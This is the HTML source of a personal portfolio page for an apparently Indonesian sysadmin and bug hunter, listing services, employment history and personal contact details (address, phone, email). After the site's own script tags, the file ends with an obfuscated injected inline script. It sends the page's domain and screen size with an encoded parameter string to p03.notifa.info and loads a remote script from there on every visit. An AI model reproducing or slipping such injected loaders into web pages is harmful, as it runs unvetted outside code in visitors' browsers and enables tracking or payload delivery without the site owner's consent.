<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <title>Web Portopolio</title>
    <link rel="icon"  href="assets/logo.svg">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <link rel="stylesheet" href="css/animate.min.css">
    <link rel="stylesheet" href="css/fancy.min.css">
    <link rel="stylesheet" href="css/owl.carousel.min.css">
    <link rel="stylesheet" href="css/aos.css">
    <link rel="stylesheet" href="css/theme.css">
    <script src="js/jquery.min.js"></script>
    <script src="js/aos.js"></script>
</head>
<body data-aos-easing="ease-out-back" data-aos-duration="1000" data-aos-delay="0">
<!-- MENU HEADER -->
<section id="header" class="" data-section="header">
    <div class="menu-header __ss ed--block">
        <nav class="navbar navbar-expand-lg navbar-light" id="mainNav">
            <div class="container">
                <a class="navbar-brand" href="#">
                    <img src="assets/logo.svg" class="logo" data-edorder="1">
                </a>
                <div id="navbarResponsive" >
                    <ul class="navbar-nav ml-auto" data-edorder="2">
                        <li class="tebal"><a class="nav-link" href="#keahlian">Keahlian</a></li>
                        <li class="tebal"><a class="nav-link" href="#tentang_saya">Tentang Saya</a></li>
                        <li class="tebal"><a class="nav-link" href="#riwayat">Riwayat</a></li>
                        <li class="tebal"><a class="nav-link" href="#hubungi_saya">Hubungi Saya</a></li>
                    </ul>
                </div>
            </div>
        </nav>
    </div>
</section>
<!-- END MENU HEADER -->
<!-- SLIDER -->
<header id="slider" class="" data-section="slider">
    <div class="slider __ss ed--block" data-multi="true">
        <div id="owl-slider" class="owl-carousel owl-theme ed--grid-block-wrap">
            <div class="item ed--grid-block-part">
                <img src="assets/era-of-devops2.png" class="img-slider d-block w-100" data-edorder="1">
                <div class="captionku">
                    <h3 data-edorder="2">KAMI TAHU YANG KAMI LAKUKAN</h3>
                    <div data-edorder="3" class="text-caption">
                        "If you enter this site, perhaps your ways is lost or you are forget it something"
                    </div>
                    <button class="btn btnmila text-white">GITLAB</button>
                </div>
            </div>
            <div class="item ed--grid-block-part">
                <img src="assets/devops2.jpg" class="img-slider d-block w-100" data-edorder="1">
                <div class="captionku">
                    <h3 data-edorder="2">ANDA BUTUH TEKNISI PROFESIONAL?</h3>
                    <div data-edorder="3" class="text-caption">
                        "sysadmin expert? i hope, someday i can do it and i have skill for it"
                    </div>
                    <button class="btn btnmila text-white">GITLAB</button>
                </div>
            </div>
        </div>
    </div>
</header>
<!-- END SLIDER -->
<!-- WHATS I DO -->
<section id="whatsido" data-section="whatsido">
    <div class="section-bergabung">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="title-bergabung">
                        <h2 data-edorder="1">My Services <font class="font-mila">Professionals</font></h2>
                        <div class="line-mila"></div>
                    </div>
                </div>
            </div>
        </div>
        <div class="container">
            <div class="row">
                <div class="col-md-5 ed--block" data-aos="zoom-in">
                    <img src="assets/asky2.png" class="img-milaserve d-block w-80" data-edorder="1">
                </div>
                <div class="col-md-7" data-aos="zoom-in-up">
                    <div class="ed--block" data-multi="true">
                        <ul class="timeline ed--grid-block-wrap">
                            <li class="timeline-inverted ed--grid-block-part">
                                <div class="timeline-badge">
                                    <img data-edorder="1" src="assets/devops1.png" class="img-produk">
                                </div>
                                <div class="timeline-panel">
                                    <div class="timeline-heading">
                                        <h4 class="timeline-title" data-edorder="2">DevOps Engineer</h4>
                                    </div>
                                    <div class="timeline-body">
                                        <div data-edorder="3">
                                            <p>
                                                DevOps Engineer has an end-to-end responsibility of the Application (Software) right from gathering the requirement to development, to testing, to infrastructure deployment, to application deployment and finally monitoring & gathering feedback from the end users, then again implementing the changes.
                                            </p>
                                        </div>
                                    </div>
                                </div>
                            </li>
                            <li class="timeline-inverted ed--grid-block-part">
                                <div class="timeline-badge">
                                    <img data-edorder="1" src="assets/pentest.jpg" class="img-produk">
                                </div>
                                <div class="timeline-panel">
                                    <div class="timeline-heading">
                                        <h4 class="timeline-title" data-edorder="2">Penetration Tester</h4>
                                    </div>
                                    <div class="timeline-body">
                                        <div data-edorder="3">
                                            <p>
                                                Their job is to ensure that the technology is secure so that individuals without authorization cannot access data. They may attempt to hack into their network in order to identify aspects of their system that are vulnerable to attack.
                                            </p>
                                        </div>
                                    </div>
                                </div>
                            </li>
                            <li class="timeline-inverted ed--grid-block-part">
                                <div class="timeline-badge">
                                    <img data-edorder="1" src="assets/sys-admin.jpg" class="img-produk">
                                </div>
                                <div class="timeline-panel">
                                    <div class="timeline-heading">
                                        <h4 class="timeline-title" data-edorder="2">System Administration</h4>
                                    </div>
                                    <div class="timeline-body">
                                        <div data-edorder="3">
                                            <p>
                                                System administrator who monitors system health, monitors and allocates system resources like disk space, performs backups, provides user access, manages user accounts, monitors system security and performs many other functions. 
                                            </p>
                                        </div>
                                    </div>
                                </div>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<!-- END WHATS I DO -->
<!-- ABOUT ME  -->
<section id="about-us" class="" data-section="about-us">
    <div class="section-tentang __ss">
        <div class="container ed--block">
            <div class="row">
                <div class="col-md-6">
                    <div class="tentang" data-aos="fade-up">
                        <h2 data-edorder="3">About <font class="font-mila">Me</font>
                        </h2>
                        <div class="line-mila"></div>
                        <div class="lead" data-edorder="4">
                            <p>I'am a System Administrator to maintain, upgrade and manage our software, hardware and networks.</p>
                            <p>Resourcefulness is a necessary skill in this role. You should be able to diagnose and resolve problems quickly. You should also have the patience to communicate with a variety of interdisciplinary teams and users.</p>
                            <p>Resourcefulness is a necessary skill in this role. You should be able to diagnose and resolve problems quickly. You should also have the patience to communicate with a variety of interdisciplinary teams and users.</p>
                        </div>
                    </div>
                </div>
                <div class="col-md-6" data-aos="fade-up">
                    <div class="wrap-box-gallery">
                        <div class="box-gallery bg-play ivplayer">
                            <a data-fancybox="" data-edorder="2" data-ivp-video="" href="https://www.youtube.com/watch?v=0FStGiUKPUQ">
                                <img data-edorder="1" class="card-img-top img-fluid" src="assets/asky5.png">
                                <div class="middle-video">
                                    <div class="icon-search-overlay-gallery">
                                        <i class="fa fa-play"></i>
                                    </div>
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<!-- END ABOUT ME -->
<!-- MY WORKS -->
<section id="myworks" class="" data-section="product">
    <div class="section-produk __ss">
        <div class="container ed--block">
            <div class="row">
                <div class="col-md-12">
                    <div class="title-produk">
                        <h2 data-edorder="1">Check My <font class="font-mila">Works</font>
                        </h2>
                        <div class="line-mila"></div>
                    </div>
                </div>
            </div>
        </div>
        <div class="container ed--block" data-multi='true'>
            <div class="row ed--grid-block-wrap">
                <div class="col-md-3 ed--grid-block-part">
                    <div class="content-work" data-aos="fade-down">
                        <img class="img-milaorg" data-edorder="1" src="assets/caid.jpg">
                        <h5 data-edorder="2">CyberArmyID</h5>
                        <div data-edorder="3">
                            <p>Bug Hunter since 2018</p>
                        </div>
                    </div>
                </div>
                <div class="col-md-3 ed--grid-block-part">
                    <div class="content-work" data-aos="fade-up">
                        <img class="img-milaorg" data-edorder="1" src="assets/esd.jpg">
                        <h5 data-edorder="2">PT. ERA SISTEM DATA</h5>
                        <div data-edorder="3">
                            <p>Senior sysadmin since 2019 s/d now </p>
                        </div>
                    </div>
                </div>
                <div class="col-md-3 ed--grid-block-part">
                    <div class="content-work" data-aos="fade-down">
                        <img class="img-milaorg" data-edorder="1" src="assets/ngesec.png">
                        <h5 data-edorder="2">NgeSEC</h5>
                        <div data-edorder="3">
                            <p>The Member of ngeSEC Community since 2017 s/d now</p>
                        </div>
                    </div>
                </div>
                <div class="col-md-3 ed--grid-block-part">
                    <div class="content-work" data-aos="fade-up">
                        <img class="img-milaorg" data-edorder="1" src="assets/tiki.png">
                        <h5 data-edorder="2">Tiki Yogyakarta</h5>
                        <div data-edorder="3">
                            <p>IT Support / Technical Support 2018 s/d 2019</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<!-- END MY WORKS -->
<!-- CONTACT ME -->
<section id="contactme" data-section="contact-us">
    <div class="section-kontak">
        <div class="container ed--block">
            <div class="row">
                <div class="col-md-12">
                    <div class="title-kontak">
                        <h2 data-edorder="1">CONTACT <font class="font-mila">ME</font>
                        </h2>
                        <div class="line-mila"></div>
                    </div>
                </div>
                <div class="col-md-8">
                    <div class="title-kontak-sub" data-aos="flip-right">
                        <h5 data-edorder="4">PHYSICAL <font class="font-mila">ADDRESS</font>
                        </h5>
                        <div class="line-mila"></div>
                        <p></p>
                        <div class="box-contact">
                            <div class="imgcontact">
                                <img src="assets/icon/home.png">
                            </div>
                            <div data-edorder="5">
                                Jl. Glagasari no.28 Warungboto Umbulharjo
                            </div>
                        </div>
                        <div class="box-contact">
                            <div class="imgcontact">
                                <img src="assets/icon/city.png">
                            </div>
                            <div data-edorder="5">
                                Yogyakarta - Indonesia
                            </div>
                        </div>
                        <div class="box-contact">
                            <a href="https://www.google.com/maps/d/u/0/embed?mid=15zT3zCotf_uQ82B6SmzPNyKubrs&ie=UTF8&msa=0&ll=-7.823295677943511%2C110.37347474924856&spn=0%2C0&t=h&output=embed&z=19" target="blank" style="color:black">
                            <div class="imgcontact">
                                <img src="assets/icon/campus.png">
                            </div>
                            <div data-edorder="5">
                                STMIK El Rahma Yogyakarta
                            </div>
                            </a>
                        </div>
                        <div class="box-contact">
                            <div class="imgcontact">
                                <img src="assets/icon/phone-2.png">
                            </div>
                            <div data-edorder="6">
                                081393106618
                            </div>
                        </div>
                        <div class="box-contact">
                            <a href="mailto:asky_el@myself.com" target="blank" style="color:black">
                            <div class="imgcontact">
                                <img src="assets/icon/pesan.png">
                            </div>
                            <div data-edorder="7">
                                asky_el@myself.com
                            </div>
                            </a>
                        </div>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="title-kontak-sub" data-aos="flip-right">
                        <h5 data-edorder="4">CONNECT WITH<font class="font-mila"> ME</font>
                        </h5>
                        <div class="line-mila"></div>
                        <p></p>
                        <div class="box-contact">
                            <a href="https://facebook.com" target="blank" style="color: black">
                                <div class="imgcontact">
                                    <img src="assets/icon/facebook.png">
                                </div>
                                <div data-edorder="5">
                                    Facebook
                                </div>
                            </a>
                        </div>
                        <div class="box-contact">
                            <a href="https://www.linkedin.com/" target="blank" style="color: black">
                                <div class="imgcontact">
                                    <img src="assets/icon/linkedin.png">
                                </div>
                                <div data-edorder="6">
                                    Linkedin
                                </div>
                            </a>
                        </div>
                        <div class="box-contact">
                            <a href="https://telegram.org/" target="blank" style="color: black">
                                <div class="imgcontact">
                                    <img src="assets/icon/telegram.png">
                                </div>
                                <div data-edorder="7">
                                    Telegram
                                </div>
                            </a>
                        </div>
                        <div class="box-contact">
                            <a href="https://instagram.com" target="blank" style="color: black">
                                <div class="imgcontact">
                                    <img src="assets/icon/instagram.png">
                                </div>
                                <div data-edorder="7">
                                    Instagram
                                </div>
                            </a>
                        </div>
                        <div class="box-contact">
                            <a href="https://gitlab.com/asky-el/uas-webdesain" target="blank" style="color: black">
                            <div class="imgcontact">
                                <img src="assets/icon/gitlab.png">
                            </div>
                            <div data-edorder="7">
                                Gitlab
                            </div>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<!-- END CONTACT ME -->
<!-- FOOTER -->
<section id="footer" class="" data-section="footer">
    <div class="section-footer" style="background: linear-gradient(to bottom right, #CC6600 0%, #CDB79E 85%);">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="copyright">
                        <span>©Copyright 2019 / All Rights Reserved</span>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
<!-- END FOOTER -->
    <script src="js/bootstrap.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/fancy.min.js"></script>
    <script src="js/jquery.easing.min.js"></script>
    <script src="js/theme.js"></script>
    <script src="js/themes.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXl3qRRW02zDBsDdv5bhXzt%2bahZAoC1uka5u3s5INaxGhthrj1vyfXybw7%2fbuX3Dm7WMYPI%2fwk02OeEK4ajQfCdkmmHyaWB%2fAMEMw%2b29b9JaWRNz9TiIZX3a13AkllyLYVCdr8MnJ2IIOYFdC2qN9HpVncypJ6txrO7BJN4bIUdtDePIj64K99lLKWoDkvACPhLbpBaCYOi8gRm1dYIswuacgySPCrGx1qI7DVmQigybrnaicsmPnM%2b1zqQbHDU2GrbKH2os01SyuE39IAnQ7yCUSZPGzD1DlT%2ftiy%2fpicH2zkmSLY60ipIjBbSToilALZ%2fhBZp1RzaUUa9%2f05VLO9qhIMN4GXB%2f3j71Ov4HBqG4%2b2zlDRQ510A2Lrdg%2f0tXKl%2fA1FAcBwjjgF3r8u7efk5IphUSkFrdVLfCeOf3gvvIuqe9jdr9BdI2uxxm%2feAia6Ffh%2b%2bdYY%2flg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
</body>
</html>
